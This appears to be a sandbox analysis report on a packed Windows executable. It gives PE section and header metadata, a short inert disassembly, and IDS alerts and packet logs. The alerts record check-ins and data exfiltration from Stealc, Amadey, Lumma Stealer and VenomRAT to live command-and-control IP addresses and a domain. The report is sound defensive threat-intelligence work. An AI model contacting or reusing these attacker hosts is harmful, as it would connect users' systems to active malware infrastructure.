jmp 00007F8C98D57135h
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24a000	0x1ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x16800	cdd661e04d5325733bd19bb29c75cba7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x1ac	0x200	f961102a37f0401fa769d938a3435cf9	False	0.5859375	data	4.492302106348125	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x2a9000	0x200	d08fe371aea24d8d020ece87ea00e9d7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jmepqeib	0x4f5000	0x19f000	0x19ec00	a18b6be3a09a68277770553355794553	False	0.9946851218731163	data	7.953655595962165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vxwpxfml	0x694000	0x1000	0x600	9694b58fbc1647def19a8253de1d1783	False	0.5794270833333334	data	5.020949249010622	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x695000	0x3000	0x2200	59abac2f3c146fae257eead57aaa4739	False	0.058363970588235295	DOS executable (COM)	0.654375047771355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x6938c8	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T00:42:02.483521+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-10T00:42:02.972943+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-10T00:42:03.096275+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-12-10T00:42:03.421107+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-10T00:42:03.553715+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-12-10T00:42:05.316170+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-10T00:42:06.054556+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-10T00:42:21.701335+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:23.557318+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:24.936953+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:26.107406+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:29.652341+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:30.809197+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:36.246750+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49759	185.215.113.16	80	TCP
2024-12-10T00:43:06.283250+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49778	185.215.113.43	80	TCP
2024-12-10T00:43:10.727371+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49790	31.41.244.11	80	TCP
2024-12-10T00:43:16.153113+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49784	TCP
2024-12-10T00:43:17.483579+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49806	185.215.113.43	80	TCP
2024-12-10T00:43:18.925323+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49812	31.41.244.11	80	TCP
2024-12-10T00:43:25.930980+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49829	185.215.113.43	80	TCP
2024-12-10T00:43:27.728237+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49830	185.215.113.16	80	TCP
2024-12-10T00:43:32.842406+0100	2057921	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)	1	192.168.2.4	58711	1.1.1.1	53	UDP
2024-12-10T00:43:34.207201+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49850	104.21.80.1	443	TCP
2024-12-10T00:43:34.207201+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49850	104.21.80.1	443	TCP
2024-12-10T00:43:34.653173+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49852	185.215.113.43	80	TCP
2024-12-10T00:43:35.245386+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49850	104.21.80.1	443	TCP
2024-12-10T00:43:35.245386+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49850	104.21.80.1	443	TCP
2024-12-10T00:43:36.116992+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49853	185.215.113.16	80	TCP
2024-12-10T00:43:36.572551+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49859	104.21.80.1	443	TCP
2024-12-10T00:43:36.572551+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49859	104.21.80.1	443	TCP
2024-12-10T00:43:37.303403+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49859	104.21.80.1	443	TCP
2024-12-10T00:43:37.303403+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49859	104.21.80.1	443	TCP
2024-12-10T00:43:39.013141+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49864	104.21.80.1	443	TCP
2024-12-10T00:43:39.013141+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49864	104.21.80.1	443	TCP
2024-12-10T00:43:41.624379+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49869	104.21.80.1	443	TCP
2024-12-10T00:43:41.624379+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49869	104.21.80.1	443	TCP
2024-12-10T00:43:42.560684+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49869	104.21.80.1	443	TCP
2024-12-10T00:43:43.599030+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49871	185.215.113.206	80	TCP
2024-12-10T00:43:43.615418+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49872	185.215.113.43	80	TCP
2024-12-10T00:43:43.981246+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49877	104.21.80.1	443	TCP
2024-12-10T00:43:43.981246+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49877	104.21.80.1	443	TCP
2024-12-10T00:43:45.126484+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49880	185.215.113.16	80	TCP
2024-12-10T00:43:45.975989+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49884	104.21.80.1	443	TCP
2024-12-10T00:43:45.975989+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49884	104.21.80.1	443	TCP
2024-12-10T00:43:46.689229+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49884	104.21.80.1	443	TCP
2024-12-10T00:43:46.689229+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49884	104.21.80.1	443	TCP
2024-12-10T00:43:47.432495+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49888	104.21.80.1	443	TCP
2024-12-10T00:43:47.432495+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49888	104.21.80.1	443	TCP
2024-12-10T00:43:48.095980+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49889	104.21.80.1	443	TCP
2024-12-10T00:43:48.095980+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49889	104.21.80.1	443	TCP
2024-12-10T00:43:48.825321+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49889	104.21.80.1	443	TCP
2024-12-10T00:43:48.825321+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49889	104.21.80.1	443	TCP
2024-12-10T00:43:50.007332+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49895	104.21.80.1	443	TCP
2024-12-10T00:43:50.007332+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49895	104.21.80.1	443	TCP
2024-12-10T00:43:50.435868+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49899	104.21.80.1	443	TCP
2024-12-10T00:43:50.435868+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49899	104.21.80.1	443	TCP
2024-12-10T00:43:50.844322+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49900	185.215.113.43	80	TCP
2024-12-10T00:43:52.328214+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49903	185.215.113.16	80	TCP
2024-12-10T00:43:53.270492+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49908	104.21.80.1	443	TCP
2024-12-10T00:43:53.270492+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49908	104.21.80.1	443	TCP
2024-12-10T00:43:55.443475+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49918	104.21.80.1	443	TCP
2024-12-10T00:43:55.443475+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49918	104.21.80.1	443	TCP
2024-12-10T00:43:55.680753+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49919	104.21.80.1	443	TCP
2024-12-10T00:43:55.680753+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49919	104.21.80.1	443	TCP
2024-12-10T00:43:55.927002+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49920	104.21.80.1	443	TCP
2024-12-10T00:43:55.927002+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49920	104.21.80.1	443	TCP
2024-12-10T00:43:56.373417+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49918	104.21.80.1	443	TCP
2024-12-10T00:43:56.373417+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49918	104.21.80.1	443	TCP
2024-12-10T00:43:56.411115+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49919	104.21.80.1	443	TCP
2024-12-10T00:43:57.736873+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49928	104.21.80.1	443	TCP
2024-12-10T00:43:57.736873+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49928	104.21.80.1	443	TCP
2024-12-10T00:43:57.875585+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	49927	185.215.113.16	80	TCP
2024-12-10T00:43:58.470274+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49928	104.21.80.1	443	TCP
2024-12-10T00:43:58.470274+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49928	104.21.80.1	443	TCP
2024-12-10T00:44:00.160287+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49933	104.21.80.1	443	TCP
2024-12-10T00:44:00.160287+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49933	104.21.80.1	443	TCP
2024-12-10T00:44:00.710865+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49936	104.21.80.1	443	TCP
2024-12-10T00:44:00.710865+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49936	104.21.80.1	443	TCP
2024-12-10T00:44:00.840203+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49935	185.215.113.43	80	TCP
2024-12-10T00:44:03.609719+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49945	104.21.80.1	443	TCP
2024-12-10T00:44:03.609719+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49945	104.21.80.1	443	TCP
2024-12-10T00:44:04.275036+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49956	104.21.80.1	443	TCP
2024-12-10T00:44:04.275036+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49956	104.21.80.1	443	TCP
2024-12-10T00:44:04.316733+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49945	104.21.80.1	443	TCP
2024-12-10T00:44:04.707811+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49960	104.21.80.1	443	TCP
2024-12-10T00:44:04.707811+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49960	104.21.80.1	443	TCP
2024-12-10T00:44:07.150837+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49965	185.215.113.206	80	TCP
2024-12-10T00:44:07.274702+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49967	104.21.80.1	443	TCP
2024-12-10T00:44:07.274702+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49967	104.21.80.1	443	TCP
2024-12-10T00:44:10.033918+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.4	49974	TCP
2024-12-10T00:44:10.033918+0100	2052265	ET MALWARE Observed Malicious SSL Cert (VenomRAT)	1	205.209.109.10	4449	192.168.2.4	49974	TCP
2024-12-10T00:44:10.033918+0100	2052267	ET MALWARE Observed Malicious SSL Cert (VenomRAT)	1	205.209.109.10	4449	192.168.2.4	49974	TCP
2024-12-10T00:44:12.157495+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49984	104.21.80.1	443	TCP
2024-12-10T00:44:12.157495+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49984	104.21.80.1	443	TCP
2024-12-10T00:44:12.862699+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49984	104.21.80.1	443	TCP
2024-12-10T00:44:16.943087+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	50002	104.21.80.1	443	TCP
2024-12-10T00:44:16.943087+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50002	104.21.80.1	443	TCP
2024-12-10T00:44:19.939091+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	50014	TCP
2024-12-10T00:44:20.414216+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	50016	104.21.80.1	443	TCP
2024-12-10T00:44:20.414216+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50016	104.21.80.1	443	TCP
2024-12-10T00:44:21.154751+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50016	104.21.80.1	443	TCP
2024-12-10T00:44:22.641161+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	50025	185.215.113.16	80	TCP
2024-12-10T00:44:25.075466+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50034	185.215.113.43	80	TCP
2024-12-10T00:44:26.605745+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.4	50045	TCP
2024-12-10T00:44:34.223184+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50079	185.215.113.206	80	TCP
2024-12-10T00:48:11.198715+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	50292	185.215.113.43	80	TCP
2024-12-10T00:49:28.144879+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.4	50319	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 00:42:00.558016062 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:00.677305937 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:00.677401066 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:00.677797079 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:00.797059059 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:02.020251989 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:02.020332098 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:02.023504019 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:02.144283056 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:02.371409893 CET	49675	443	192.168.2.4	173.222.162.32
Dec 10, 2024 00:42:02.483445883 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:02.483520985 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:02.484852076 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:02.606520891 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:02.972871065 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:02.972943068 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:02.972945929 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:02.972987890 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:02.974572897 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:03.096275091 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:03.421025038 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:03.421039104 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:03.421050072 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:03.421107054 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:03.421125889 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:03.421308041 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:03.421319008 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:03.421328068 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:03.421358109 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:03.421392918 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:03.432210922 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:03.553714991 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:03.877968073 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:03.878040075 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:04.236251116 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:04.236489058 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:04.355499029 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:04.355787039 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:04.355796099 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:04.355890036 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:04.355945110 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:04.355952978 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:04.356000900 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:04.356029987 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:05.316096067 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:05.316169977 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:05.612843990 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:05.732178926 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.054338932 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.054436922 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.054555893 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.054555893 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.058433056 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.058484077 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.059287071 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.059381962 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.059453964 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.067677975 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.067739010 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.067786932 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.067857981 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.076029062 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.076082945 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.076147079 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.076186895 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.084363937 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.084422112 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.084464073 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.084506989 CET	49730	80	192.168.2.4	185.215.113.206
